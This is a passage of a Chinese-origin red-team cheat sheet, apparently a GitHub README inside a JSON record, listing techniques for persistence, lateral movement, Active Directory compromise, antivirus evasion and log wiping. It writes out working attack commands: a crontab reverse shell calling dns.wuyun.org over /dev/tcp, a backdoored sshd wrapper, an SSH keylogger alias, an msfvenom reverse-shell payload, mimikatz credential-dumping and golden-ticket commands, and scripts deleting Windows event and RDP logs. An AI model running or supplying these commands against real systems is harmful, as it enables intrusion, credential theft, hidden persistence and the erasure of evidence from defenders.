keys](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E6%9B%B4%E5%A4%9A%E6%B5%8B%E8%AF%95/)\n##### 28. Shortcut backdoor \nReplace the launch arguments of the My Computer shortcut\nPOC : https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Backdoor/LNK_backdoor.ps1\n##### 29. [Logon Scripts](https://3gstudent.github.io/3gstudent.github.io/Use-Logon-Scripts-to-maintain-persistence/) \n```\nNew-ItemProperty \"HKCU:\\Environment\\\" UserInitMprLogonScript -value \"c:\\test\\11.bat\" -propertyType string | Out-Null\n```\n##### 30. 
[Password Filter DLL](https://3gstudent.github.io/3gstudent.github.io/Password-Filter-DLL%E5%9C%A8%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84%E5%BA%94%E7%94%A8/) \n##### 31. [Using a BHO to hijack Internet Explorer](https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BHO%E5%AE%9E%E7%8E%B0IE%E6%B5%8F%E8%A7%88%E5%99%A8%E5%8A%AB%E6%8C%81/) \n##### 32. [SharPersist](https://github.com/fireeye/SharPersist/wiki)\n\n#### Linux \n##### crontab \nEvery 60 minutes, send a reverse shell to port 53 of dns.wuyun.org\n```\n#!bash\n(crontab -l;printf \"*/60 * * * * exec 9\u003c\u003e /dev/tcp/dns.wuyun.org/53;exec 0\u003c\u00269;exec 1\u003e\u00269 2\u003e\u00261;/bin/bash --noprofile -i;\\rno crontab for `whoami`%100c\\n\")|crontab -\n```\nOn the dns.wuyun.org VPS, [Platypus](https://github.com/WangYihang/Platypus) can be used to manage the reverse shells\n##### Linked sshd \n```\n#!bash\nln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=2333;\n```\nConnect: ssh root@192.168.206.142 -p 2333\n##### SSH Server wrapper \n```\n#!bash\ncd /usr/sbin\nmv sshd ../bin\necho '#!/usr/bin/perl' \u003esshd\necho 'exec \"/bin/sh\" if (getpeername(STDIN) =~ /^..4A/);' \u003e\u003esshd\necho 'exec {\"/usr/bin/sshd\"} \"/usr/sbin/sshd\",@ARGV,' \u003e\u003esshd\nchmod u+x sshd\n# a restart is not strictly required\n/etc/init.d/sshd restart\n```\n```\nsocat STDIO TCP4:192.168.206.142:22,sourceport=13377\n```\n##### SSH keylogger \nOpen the current user's .bashrc in vim and append at the end\n```\n#!bash\nalias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'\n```\nsource .bashrc\n##### Cymothoa process-injection backdoor \n```\n./cymothoa -p 2270 -s 1 -y 7777\n```\n```\nnc -vv ip 7777\n```\n##### Vegile process-injection backdoor\n\n```bash\nmsfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=127.0.0.1  LPORT=8080  -f elf -o /tmp/backdoor\n```\n\n```bash\n# process injection\nVegile --i /tmp/backdoor\n# unlimited respawn\nVegile --u /tmp/backdoor\n```\n\n##### rootkit\n\n* [openssh_rootkit](http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz)\n* [Kbeast_rootkit 
](http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz)\n* Mafix + Suterusu rootkit\n\n##### Tools\n\n* [Vegile](https://github.com/Screetsec/Vegile)\n* [backdoor](https://github.com/icco/backdoor)\n\n### Web backdoors\n\nPHP Meterpreter backdoor \nAspx Meterpreter backdoor \nweevely \nwebacoo  \n....\n\n## Lateral movement\n### Port-based penetration \n#### Port scanning \n* 1. Port fingerprint information (version information) \n* 2. The service running on the port  \n* 3. Common default port numbers  \n* 4. Try weak passwords \n\n####  Port brute forcing \n* [hydra](https://github.com/vanhauser-thc/thc-hydra)\n* [Crowbar](https://github.com/galkan/crowbar) -- OpenVPN/RDP/SSH/VNC\n* [PortBrute](https://github.com/awake1t/PortBrute) -- brute-forces FTP/SSH/SMB/MSSQL/MYSQL/POSTGRESQL/MONGOD (written in Go, cross-platform)\n\n#### Weak passwords on ports \n* NTScan  \n* Hscan  \n* Custom scripts \n\n#### Port overflows \n**smb**\n* ms08067 \n* ms17010 \n* ms11058 \n* ... \n\n**apache**\n**ftp** \n**...**\n\n#### Common default ports  \n##### 1. Web (web vulnerabilities / sensitive directories)  \nVulnerabilities in common third-party components: struts thinkphp jboss ganglia zabbix ...\n```\n80 web \n80-89 web \n8000-9090 web \n```\n##### 2. Databases (scan for weak passwords)  \n```\n1433 MSSQL \n1521 Oracle \n3306 MySQL \n5432 PostgreSQL \n50000 DB2\n```\n##### 3. Special services (unauthenticated access / command execution / vulnerabilities)  \n```\n443 SSL Heartbleed \n445 ms08067/ms11058/ms17010, etc. \n873 Rsync unauthenticated access \n5984 CouchDB http://xxx:5984/_utils/ \n6379 redis unauthenticated access \n7001,7002 WebLogic default weak passwords, deserialization \n9200,9300 elasticsearch see WooYun: ElasticSearch command execution vulnerability on a Duowan server \n11211 memcache unauthenticated access \n27017,27018 Mongodb unauthenticated access \n50000 SAP command execution \n50070,50030 hadoop default ports, unauthenticated access \n```\n##### 4. Common ports (weak-password scanning / brute forcing)  \n\n```\n21 ftp \n22 SSH \n23 Telnet \n445 SMB weak-password scanning \n2601,2604 zebra routing, default password zebra \n3389 Remote Desktop \n5800,5801,5900,5901 VNC\n```\n\n##### 5. 
Summary of ports and the services behind them  \n```\n21 ftp \n22 SSH \n23 Telnet \n25 SMTP \n53 DNS \n69 TFTP \n80 web \n80-89 web \n110 POP3 \n135 RPC \n139 NETBIOS \n143 IMAP \n161 SNMP \n389 LDAP \n443 SSL Heartbleed and some web vulnerability testing \n445 SMB \n512,513,514 Rexec \n873 Rsync unauthenticated access \n1025,111 NFS \n1080 socks \n1158 ORACLE EMCTL \n1433 MSSQL (brute force) \n1521 Oracle:(iSqlPlus Port:5560,7778) \n2082/2083 cpanel hosting control panel login (mostly used abroad) \n2222 DA hosting control panel login (mostly used abroad) \n2601,2604 zebra routing, default password zebra \n3128 squid proxy default port; without a password it may allow roaming the internal network directly \n3306 MySQL (brute force) \n3312/3311 kangle hosting control panel login \n3389 Remote Desktop (RDP)\n3690 svn \n4440 rundeck see WooYun: using a Sina service to roam Sina's internal network \n4848 GlassFish web middleware, weak password: admin/adminadmin \n5432 PostgreSQL \n5900 vnc \n5984 CouchDB http://xxx:5984/_utils/ \n6082 varnish see WooYun: Varnish HTTP accelerator CLI unauthenticated access can lead to direct site tampering or use as a proxy into the internal network \n6379 redis unauthenticated access \n7001,7002 WebLogic default weak passwords, deserialization \n7778 Kloxo hosting control panel login \n8000-9090 common web ports; some operators like to put admin consoles on these non-80 ports \n8080 tomcat/WDCd/ hosting control panel, default weak passwords \n8080,8089,9090 JBOSS \n8081 Symantec AV/Filter for MSE \n8083 Vestacp hosting control panel (mostly used abroad) \n8649 ganglia \n8888 amh/LuManager hosting control panel default port \n9000 fcgi php execution via fastcgi \n9043 websphere [web middleware] weak passwords: admin/admin websphere/websphere system/manager \n9200,9300 elasticsearch see WooYun: ElasticSearch command execution vulnerability on a Duowan server \n10000 Virtualmin/Webmin server virtual host management \n11211 memcache unauthenticated access \n27017,27018 Mongodb unauthenticated access \n28017 mongodb statistics page \n50000 SAP command execution \n50060 hadoop \n50070,50030 hadoop default ports, unauthenticated access\n```\n### Domain penetration \n#### Information gathering \n##### powerview.ps1 \n```\nGet-NetDomain - gets the name of the current user's domain\nGet-NetForest - gets the forest associated with the current user's domain\nGet-NetForestDomains - gets all domains for the current forest\nGet-NetDomainControllers - gets the domain controllers for the current computer's domain\nGet-NetCurrentUser - gets the current [domain\\]username\nGet-NetUser - returns all user objects, or the user specified (wildcard specifiable)\nGet-NetUserSPNs - gets all user ServicePrincipalNames\nGet-NetOUs - gets data for domain 
organization units\nGet-NetGUIDOUs - finds domain OUs linked to a specific GUID\nInvoke-NetUserAdd - adds a local or domain user\nGet-NetGroups - gets a list of all current groups in the domain\nGet-NetGroup - gets data for each user in a specified domain group\nGet-NetLocalGroups - gets a list of localgroups on a remote host or hosts\nGet-NetLocalGroup - gets the members of a localgroup on a remote host or hosts\nGet-NetLocalServices - gets a list of running services/paths on a remote host or hosts\nInvoke-NetGroupUserAdd - adds a user to a specified local or domain group\nGet-NetComputers - gets a list of all current servers in the domain\nGet-NetFileServers - get a list of file servers used by current domain users\nGet-NetShare - gets share information for a specified server\nGet-NetLoggedon - gets users actively logged onto a specified server\nGet-NetSessions - gets active sessions on a specified server\nGet-NetFileSessions - returned combined Get-NetSessions and Get-NetFiles\nGet-NetConnections - gets active connections to a specific server resource (share)\nGet-NetFiles - gets open files on a server\nGet-NetProcesses - gets the remote processes and owners on a remote server\n```\n##### BloodHound\n\n**Get all computers under a given OU**\n```\n{\n            \"name\": \"Find the specified OU computers\",\n            \"queryList\": [\n                {\n                    \"final\": false,\n                    \"title\": \"Select a OU...\",\n                    \"query\": \"MATCH (n:OU) RETURN distinct n.name ORDER BY n.name DESC\"\n                },\n                {\n                    \"final\": true,\n                    \"query\": \"MATCH (m:OU  {name: $result}) with m MATCH p=(o:OU {objectid: m.objectid})-[r:Contains*1..]-\u003e(n:Computer) RETURN p\",\n                    \"allowCollapse\": true,\n                    \"endNode\": \"{}\"\n                }\n            ]\n        }\n```\n\n**Automatically mark owned users and machines**\n\n[SyncDog](https://github.com/Lz1y/SyncDog)\n\n\n##### 
Obtaining DNS information within the domain\n* [adidnsdump](https://github.com/dirkjanm/adidnsdump)\n* [Domain penetration: obtaining DNS records](https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-DNS%E8%AE%B0%E5%BD%95%E7%9A%84%E8%8E%B7%E5%8F%96/)\n* After downloading all records from the DNS server, [dns-zonefile](https://github.com/elgs/dns-zonefile) can be used to export the txt as JSON\n          \n#### Ways of obtaining the domain controller \n##### SYSVOL \nSYSVOL is the shared folder that holds the domain's public file server replica; it is replicated between all domain controllers in the domain. The Sysvol folder is created when AD is installed and holds GPOs, scripts and similar data. Data stored in the Sysvol folder is replicated to every DC in the domain. \nFurther reading: \n* [Finding passwords in SYSVOL and attacking GPP (Group Policy Preferences)](http://www.freebuf.com/vuls/92016.html)\n* [Windows Server 2008 R2 part 4: managing the Sysvol folder](http://blog.51cto.com/ycrsjxy/203095)\n* [Finding passwords in SYSVOL and exploiting Group Policy Preferences](https://adsecurity.org/?p=2288)\n* [Using SYSVOL to recover passwords stored in Group Policy](https://xz.aliyun.com/t/1653) \n\n##### MS14-068 Kerberos \n```\npython ms14-068.py -u \u003cdomain user\u003e@\u003cdomain\u003e -p \u003cpassword\u003e -s \u003cuser SID\u003e -d \u003cdomain host\u003e\n```\nUse mimikatz to load the TGT_domainuser@SERVER.COM.ccache produced by the tool into memory, creating a cached ticket:\n```\nmimikatz.exe \"kerberos::ptc c:\\TGT_darthsidious@pentest.com.ccache\" exit\nnet use k: \\\\pentest.com\\c$\n```\nFurther reading:\n* [PyKEK Kerberos toolkit](http://adsecurity.org/?p=676) \n* [In-depth analysis of MS14-068](http://www.freebuf.com/vuls/56081.html)\n* [Kerberos security vulnerabilities](https://adsecurity.org/?p=541) \n\n##### SPN scanning \nKerberoast is an effective way to extract service account credentials from Active Directory as a normal user, without sending any packets to the target system.\nAn SPN is the unique identifier of a service on a network that uses Kerberos authentication. It consists of a service class, a host name and a port. On a network using Kerberos authentication, an SPN must be registered for the server under either a built-in computer account (such as NetworkService or LocalSystem) or a user account. For built-in accounts the SPN is registered automatically, but if a service runs under a domain user account, the SPN must be registered manually for the account that will be used.\nThe main benefit of SPN scanning is that it does not need to connect to every IP on the network to probe service ports: SPN scanning performs service discovery through LDAP queries to the domain controller, and SPN queries are part of normal Kerberos ticket behaviour, so SPN scanning is relatively hard to detect.\nFurther reading:\n* [Non-scanning SQL Server discovery](https://blog.netspi.com/locate-and-attack-domain-sql-servers-without-scanning/) \n* [SPN scanning](https://adsecurity.org/?p=1508) \n* [Scripts for scanning SQL Server](https://github.com/PyroTek3/PowerShell-AD-Recon) \n\n##### Kerberos Golden Ticket \nHashes captured on the domain\n```\nlsadump::dcsync /domain:pentest.com /user:krbtgt\n```\n```\nkerberos::purge\nkerberos::golden /admin:administrator /domain:\u003cdomain\u003e /sid:\u003cSID\u003e /krbtgt:\u003chash\u003e 
/ticket:administrator.kiribi\nkerberos::ptt administrator.kiribi\nkerberos::tgt\nnet use k: \\\\pentest.com\\c$\n```\nFurther reading:\n* https://adsecurity.org/?p=1640 \n* [Domain service account cracking in practice](http://bobao.360.cn/learning/detail/3564.html) \n* [Kerberos authentication principles](https://blog.csdn.net/wulantian/article/details/42418231) \n* [Understanding the Windows authentication mechanisms NTLM and Kerberos in depth](https://klionsec.github.io/2016/08/10/ntlm-kerberos/) \n\n#####  Kerberos Silver Ticket\nSome differences between golden and silver tickets:\nGolden Ticket: forges a `TGT` and can obtain access to `any Kerberos` service\nSilver Ticket: forges a TGS and `can only access the specified service`\nDifferent encryption keys:\nA Golden Ticket is encrypted with the `krbtgt` hash\nA Silver Ticket is encrypted with the `service account` (usually a computer account) hash\nDifferent authentication flow:\nUsing a golden ticket requires communication with the domain controller\nUsing a silver ticket does not require communication with the domain controller\nFurther reading:\n* [How attackers use Kerberos Silver Tickets to exploit systems](https://adsecurity.org/?p=2011) \n* [Domain penetration: Pass The Ticket](https://www.feiworks.com/wy/drops/%E5%9F%9F%E6%B8%97%E9%80%8F%E2%80%94%E2%80%94Pass%20The%20Ticket.pdf)\n\n##### Domain service account cracking \nSame principle as the SPN scanning above\nhttps://github.com/nidem/kerberoast\nGet all accounts used as SPNs\n```\nsetspn -T PENTEST.com -Q */*\n```\nExtract the obtained tickets from memory with Mimikatz\n```\nkerberos::list /export\n```\nCrack with tgsrepcrack\n```\ntgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi\n```\n##### Credential theft \nLook for administrator passwords among the collected passwords \n\n##### NTLM relay\n * [One API call away from Domain Admin](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/)\n * [privexchange](https://github.com/dirkjanm/privexchange/)\n * [Exchange2domain](https://github.com/ridter/exchange2domain)\n\n##### Kerberos delegation\n * [Wagging-the-Dog.html](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html)\n * [s4u2pwnage](https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/)\n * [Attacking Kerberos Delegation](https://xz.aliyun.com/t/2931)\n * [Taking over the domain controller via the print service](https://adsecurity.org/?p=4056)\n * [Computer Takeover](https://www.harmj0y.net/blog/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/)\n * [Combining NTLM Relaying and Kerberos delegation](https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/)\n * 
[CVE-2019-1040](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/)\n\n##### Address Resolution Protocol \nOnly fall back to ARP when nothing else works \n\n#### Obtaining AD hashes \n* Use VSS volume shadow copies \n* Obtain the NTDS.DIT file with Ntdsutil \n* Extract NTDS.DIT with PowerShell --\u003e[Invoke-NinjaCopy](https://github.com/clymb3r/PowerShell/tree/master/Invoke-NinjaCopy)\n* Extract with Mimikatz \n\n```\nmimikatz lsadump::lsa /inject exit \n```\n* Use PowerShell Mimikatz\n* Use Mimikatz DCSync to dump Active Directory credentials remotely\nExtract the password data of the KRBTGT user account:\n\n```\nMimikatz \"privilege::debug\" \"lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt\" exit\n```\nExtract the password data of the Administrator user account:\n```\nMimikatz \"privilege::debug\" \"lsadump::dcsync /domain:rd.adsecurity.org /user:Administrator\" exit\n\n```\n* Extract hashes from NTDS.dit \nRecover it with esedbexport, then extract with ntdsxtract \n\n#### AD persistence \n##### Active Directory persistence tricks \nhttps://adsecurity.org/?p=1929 \nDS Restore Mode password maintenance \nDSRM password synchronization \n\u003eWindows Server 2008 needs patch KB961320 to support DSRM password synchronization; Windows Server 2003 does not support it. KB961320: https://support.microsoft.com/en-us/help/961320/a-feature-is-available-for-windows-server-2008-that-lets-you-synchroni, see also: [Using DSRM password synchronization to make domain controller access persistent](http://drops.xmd5.com/static/drops/tips-9297.html)\n\n[DCshadow](https://www.dcshadow.com/)\n\n##### Security Support Provider \nPut simply, an SSP is a DLL that implements authentication\n```\nprivilege::debug\nmisc::memssp\n```\nThis way no reboot is needed; the newly generated file kiwissp.log appears in `c:/windows/system32`\n##### [SID History](https://adsecurity.org/?p=1772) \nSID history allows the access rights of one account to be effectively cloned onto another\n```\nmimikatz \"privilege::debug\" \"misc::addsid bobafett ADSAdministrator\"\n```\n##### [AdminSDHolder \u0026 SDProp](https://adsecurity.org/?p=1906)\nUse AdminSDHolder \u0026 SDProp to (re)gain domain admin privileges \n##### Group Policy \nhttps://adsecurity.org/?p=2716 \n[Group Policy Objects in persistence and lateral movement](https://www.anquanke.com/post/id/86531) \n##### Hook PasswordChangeNotify \nhttp://www.vuln.cn/6812\n\n##### Kerberoasting backdoor\n[Domain penetration: Kerberoasting](https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-Kerberoasting/)\n\n##### AdminSDHolder\n[Backdooring AdminSDHolder for 
Persistence](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence)\n\n##### Delegation\n[Unconstrained Domain Persistence](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#unconstrained-domain-persistence)\n\n#### Other\n##### Privilege escalation on domain hosts\n[SharpAddDomainMachine](https://github.com/Ridter/SharpAddDomainMachine)\n##### Exploiting Exchange\n* [**Exchange2domain**](https://github.com/Ridter/Exchange2domain)\n* [**CVE-2018-8581**](https://github.com/WyAtu/CVE-2018-8581/)\n* [**CVE-2019-1040**](https://github.com/Ridter/CVE-2019-1040) \n* [**CVE-2020-0688**](https://github.com/Ridter/CVE-2020-0688)\n* [**NtlmRelayToEWS**](https://github.com/Arno0x/NtlmRelayToEWS)\n* [**ewsManage**](https://github.com/3gstudent/ewsManage)\n\n#### TIPS \n[Domain penetration: Dump Clear-Text Password after KB2871997 installed](https://github.com/3gstudent/Dump-Clear-Password-after-KB2871997-installed)\n\n[Domain penetration: Hook PasswordChangeNotify](http://www.vuln.cn/6812) \n\u003eHooking PasswordChangeNotify can record domain admins' new passwords in real time \n\n[Domain penetration: Local Administrator Password Solution](http://www.liuhaihua.cn/archives/179102.html)\n\u003eDuring domain penetration, keep an eye on the local administrator accounts of domain hosts \n\n[Domain penetration: using SYSVOL to recover passwords stored in Group Policy](https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8SYSVOL%E8%BF%98%E5%8E%9F%E7%BB%84%E7%AD%96%E7%95%A5%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81/)\n\n#### Related tools \n* [BloodHound](https://github.com/BloodHoundAD/BloodHound)\n* [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)\n* [DeathStar](https://github.com/byt3bl33d3r/DeathStar) \n  \n  \u003eUsage walkthrough: http://www.freebuf.com/sectool/160884.html \n\n### Executing programs on remote systems \n* At \n* Psexec \n* WMIC \n* Wmiexec \n* Smbexec \n* Powershell remoting \n* DCOM \n* [Winrm](https://github.com/Hackplayers/evil-winrm)\n* [SharpWmi](https://github.com/QAX-A-Team/sharpwmi) -- lateral movement tool based on port 135, with command execution and file upload\n* 
[goWMIExec](https://github.com/C-Sto/goWMIExec) -- pure Go implementation; runs on Linux without depending on impacket\n\n### IoT \n* 1. Routers [routersploit](https://github.com/reverse-shell/routersploit)\n* 2. Printers [PRET](https://github.com/RUB-NDS/PRET)\n* 3. IoT exploits https://www.exploitee.rs/\n* 4. Related \n[OWASP-Nettacker](https://www.owasp.org/index.php/OWASP_Nettacker)\n[isf](https://github.com/dark-lbp/isf) \n[icsmaster](https://github.com/w3h/icsmaster)\n\n### Man in the middle \n* [Cain](http://www.oxid.it/cain.html) \n* [Ettercap](https://github.com/Ettercap/ettercap) \n* [Responder](https://github.com/SpiderLabs/Responder) \n* [MITMf](https://github.com/byt3bl33d3r/MITMf) \n* [bettercap](https://github.com/evilsocket/bettercap) \n  \n### Evading antivirus and detection \n#### Bypass Applocker \n[UltimateAppLockerByPassList](https://github.com/api0cradle/UltimateAppLockerByPassList)\nhttps://lolbas-project.github.io/ \n\n####  bypassAV    \n* Empire \n* PEspin \n* Shellter \n* Ebowla \n* Veil \n* PowerShell \n* Python \n* [Process Doppelgänging code injection technique](http://www.4hou.com/technology/9379.html)\n* [Disable-Windows-Defender](https://github.com/NYAN-x-CAT/Disable-Windows-Defender)\n* ...\n\n## Covering tracks\n### [Clearing Windows logs](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E6%97%A5%E5%BF%97%E7%9A%84%E5%88%A0%E9%99%A4%E4%B8%8E%E7%BB%95%E8%BF%87/) \nGet the list of log categories:\n```\nwevtutil el \u003e1.txt\n```\nGet statistics for a single log category:\ne.g.\n\n```\nwevtutil gli \"windows powershell\"\n```\nOutput:\n```\ncreationTime: 2016-11-28T06:01:37.986Z\nlastAccessTime: 2016-11-28T06:01:37.986Z\nlastWriteTime: 2017-08-08T08:01:20.979Z\nfileSize: 1118208\nattributes: 32\nnumberOfLogRecords: 1228\noldestRecordNumber: 1\n```\nView the contents of a specific log:\n```\nwevtutil qe /f:text \"windows powershell\"\n```\nDelete all entries of a single log category:\n```\nwevtutil cl \"windows powershell\"\n```\n### Disabling Windows event logging \nTools \n* [Invoke-Phant0m](https://github.com/hlldz/Invoke-Phant0m) \n* [Windwos-EventLog-Bypass](https://github.com/3gstudent/Windwos-EventLog-Bypass) \n* [Phant0m | 
Windows Event Log Killer]()\n\n### msf \n```\nrun clearlogs \n```\n```\nclearev \n```\n### Clearing 3389 (RDP) logon records \n```\n@echo off\n@reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f\n@del \"%USERPROFILE%\\My Documents\\Default.rdp\" /a\n@exit\n```\n\n","funding_links":[],"categories":["Others"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fzer0yu%2FRedTeam_CheetSheets","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fzer0yu%2FRedTeam_CheetSheets","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fzer0yu%2FRedTeam_CheetSheets/lists"}